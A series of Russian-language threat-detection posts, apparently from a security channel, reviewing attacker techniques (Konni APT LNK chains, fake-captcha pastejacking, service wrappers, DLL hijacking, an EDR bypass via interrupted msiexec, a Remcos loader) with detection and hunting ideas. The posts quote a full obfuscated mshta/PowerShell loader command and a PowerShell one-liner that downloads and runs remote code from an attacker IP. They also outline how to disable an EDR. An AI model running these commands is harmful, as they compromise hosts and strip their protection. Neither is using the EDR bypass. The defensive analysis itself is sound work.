Всем привет! ✌️

Давайте сегодня посмотрим отчет, связанный с TTP Konni APT

🔤 Первый LNK запускает mshta.exe со следующими аргументами:

javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x08e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x17cb;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);

🔤 Скрипт выполняет поиск LNK-файла, сначала в текущей директории, потом в TEMP. LNK-файла должен быть определенного размера

🔤 Из найденного LNK извлекается PowerShell- скрипт и сохраняется в ProgramData\e.ps1

Хакеры часто используют самоизвлекающиеся LNK-файлы, чтобы доставить второй этап атаки

🔤 e.ps1 обфусцированный скрипт, который обращается на C2 и загружает с dropbox архив

🔤Для закрепления хакеры использовали планировщик задач и ключ реестра Run

🔤 Также скрипт получает c С2 текст, кодированный Base64 и выполняет его


🔭 Для обнаружения:

🔤 отслеживаем создание LNK и PS1 файлов в директориях пользователя

🔤 в аргументах Powershell ищем -Encoding Byte, DecodeByte. Можем поискать в логах Powershell или аргументах наличие Base64-строк

🔤 отслеживаем создание новых задач в журнале Security EventId = 4698. В данном событии содержится xml созданной задачи.

Для хантинга:

🔤 можем собрать и спарсить все задачи пользователей, и проанализировать Автора, Исполняемый файл, Аргументы

🔤 наличие в ключах реестра Run скриптов

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! 💻✌️

Продолжим обзор Konni APT

В постах раннее мы увидели, что Konni используют фишинг для получения доступа и длинные multistage цепочки из lnk bat powershell autoit и других исполняемых файлов

В отчете от Cyfirma аналитики объясняют страсть к lnk следующими возможностями Windows 📄:

скрытие расширения файла в проводнике Windows и ограничение отображения аргументов в 260 символов в файлах LNK

Уже не секрет, что если вставить много пробелов в названии файлов, то расширение не будет видно в проводнике, а для LNK расширение не отображается, даже если включить в настройках проводника опцию - Отображать известные расширения файлов. Включить отображение LNK можно поправив ключ в реестре.

⚠️ Еще одна особенность проводника в отображении свойств LNK-файлов - отображается только 260 символов из поля Аргументы.

Давайте перейдем к самой атаке:

🔤 Атака началась с фишинга, ZIP с DOCX.LNK и 2 PDF-файла. Хакеры воспользовались пробелами в аргументах LNK, чтобы остаться незамеченными

🔤 Команда в LNK - это обфусцированный cmd+powershell скрипт

🔤 Вначале CMD-скрипт ищет интерпретатор Powershell и запускает его

🔤 Хакеры в очередной раз используют self-extracted lnk, в этом случае для открытия docx - decoy-файла (странное поведение, у них в архиве было еще 2 pdf....)

🔤Далее по другому смещению из LNK извлекается CAB-файл и vbs-скрипт в директорию C:\Users\Public\Documents

🔤VBS-скрипт извлекает файлы из CAB

🔤 Из CAB извлекается семь bat-файлов, которые продолжают вредоносную цепочку

🔤 И классика, в качестве закрепа в ключ реестра Run добавляется vbs

🔭 Для обнаружения, в дополнение к посту ранее:

🔤 запуск офисных документов не проводником, и не браузером и не почтовым клиентом или запуск офисных документов скриптами

🔤 создание bat-файлов

🔤 добавление скриптов в ключи реестра для автозапуска

🔤 создание CAB-файлов в директориях пользователя

🔤 создание файлов в C:\Users\Public. Наверное может получится неплохой хант, если начать анализировать файлы в сабдиректориях)

PT ESC недавно писали как хакеры ломают парсеры LNK-файлов, чтобы остаться незамеченными

#detection@detectioneasy
#ttp@detectioneasy

Всем привет! 💻✌️

Сегодня рассмотрим технику fake captcha

Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот 🤖

Капча необычная, есть нюанс - используется техника "clipboard hijacking" или "pastejacking" - в буфер обмена добавляется вредоносный скрипт, далее нужно нажать сочетание клавиш Win+R, далее в появившемся окне нажать Ctrl+V , и подтвердить, что вы молодец - Verify 🦣

В буфер обмена вставлялся вот такой скрипт:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

Для формирования url, считается количество секунд между двумя датами.

🔭 Что делать:

🔤 запретить пользователям Win + R ❌

🔤 отслеживать создание новых ключей в ветке реестра HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\

Для ханта, необходимо собрать значения ключей HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ всех пользователей, и провести анализ. Можно предусмотреть исключения, что-то могли использовать админы

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наткнулся на прикольную технику для кражи учетных данных)

Утилита называется Win10CredsThief

Сценарий использования на red team может быть такой: пробили тачку и не получается продвинуться, повыситься, получить хеш и т.п. И тут в дело вступает социалка, Win10CredsThief - это html страница, которая мимикрирует под экран блокировки Windows10. Написано довольно хорошо и пользователь вряд ли что-то заподозрит

Для убедительности лучше проверять какое изображение для блокировки используется в организации, чтобы не вызвать лишних подозрений

🔭 Что делать:
🔤 отслеживать запуск браузера в режиме киоска --kiosk

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Бывает, что нужно создать службу, но соответствующего файла нет? Злоумышленники используют NSSM (Non-Sucking Service Manager) для закрепления в системе

NSSM - это инструмент, который позволяет запускать любой исполняемый файл как службу.

⚠️ Пример использования:
У хакеров есть вредоносный файл, который не может запускаться как служба, nssm выступает в роли обертки для него

🔭 Что делать:
🔤 отслеживаем создание процесса с параметрами

Description = "The non-sucking service manager" or 
Product = "NSSM 64-bit"

Можем похантить:

🔤 наличие куста реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\NSSM, если существует в нем можем посмотреть EventMessageFile - путь к nssm.exe

🔤 наличие логов в журнале Application от провайдера nssm

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng

Создается служба из консоли cmd или powershell:

sc create "MyServiceName" start= auto binPath= "C:\Path\To\srvany-ng.exe"

это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)

Для мониторинга можем использовать следующую информацию о файле:

Description = Run any Windows application as a Service.
Product = srvany-ng
Company = Anthony Birkett
OriginalFileName = srvany-ng.exe

🔤 Правило корреляции можно сделать на отслеживание цепочки запуска процессов svchost.exe -> *.exe -> *.exe
Скорее всего нужно будет профилировать

🔤 Для хантинга можем поискать следующую информацию в реестре:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*\Parameters\ ключ Application - путь к файлу который запустит служба

Дополнительно в Application могут быть ключи:

AppDirectory 
AppParameters
AppEnvironment
RestartOnExit

⚠️ Можно проверить, что файл службы имеет расширение exe и файл в Application - тоже имеет расширение exe

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Получают ли Ваши сотрудники файлы SVG?

ЛК представили небольшой обзор злоупотребления SVG.

SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML

SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)

🔭 Обнаружение:

🔤 Создание svg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.svg"

🔤 Детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"

🔤 Мониторить создание процессов у которых в аргументах содержится ".*svg\s.*"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB

Для монтирования сетевой папки, часто используют команду net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak

🔭 Обнаружение:

🔤 Мониторим запуск net.exe или net1.exe с аргументами use

🔤 Отслеживаем создание процессов, которые начинаются с \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q:

🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети

🔤 В журнале Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям

🎯 Для хантинга можем проверить:

🔤 ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.

Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:

🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution

🔭 Обнаружение:

🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса

🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущим

🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей c:\windows\system32 c:\windows\syswow64 c:\windows\winsxs

🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)

Скорее всего будет очень шумно...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.

Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.

Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в %WINDIR%\Installer

🔭 Обнаружение:

🔤 Обнаруживаем локальные попытки установки edr/av msiexec /i или восстановления msiexec /fa
🔤 Обнаруживаем попытки использования пакетов из %WINDIR%\Installer, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера MsiInstaller


События при нормальной установке пакета

1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)

События при удалении пакета

11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию) 

Событие при обновлении конфигурации

11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета

События при завершении установки с ошибкой

1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)

Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec

Дополнительно информацию об установленных пакетах можно посмотреть в реестре - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\<SID>\Products\<GUID>\InstallProperties . В этом разделе реестра есть интересный ключ - InstallSource по которому можно похантить аномалии в установке EDR и т.п.

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it

#detection@detectioneasy

Всем привет 💻✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит sethc.exe (utilman.exe) на cmd.exe, и создаст нового пользователя?

Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает 😄)

Плохие парни нажимают пару раз shift и получают права system 👤на серваке

🔭 Что же нам делать?

🔤 отслеживаем копирование системных файлов sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя winlogon.exe и пользователя system
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память. 😈

Что происходит❓

Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).

При открытии срабатывает цепочка:

🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп HKCU:\…\CurrentVersion\Run, загрузки hta, ps1 и decoy-файла в C:\Users\Public, добавление директории C:\Users\Public в исключения Windows Defender (Add-MpPreference -ExclusionPath). В закреп добавлялась powershell-команда для запуска hta_)
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через VirtualAlloc, копирует шеллкод и запускает его через CallWindowProcW, запускается Remcos RAT

Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc


🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в HKLM\...\Run и HKCU\...\Run
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell VirtualAlloc, CallWindowProcW
🔤 Добавление исключений в defender (в AV)

Может получиться интересный хант

Мы можем собрать и группировать исключения AV с хостов. 
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_) 

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)

Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source

Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠

🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC

#detection@detectioneasy
#ttp@detectioneasy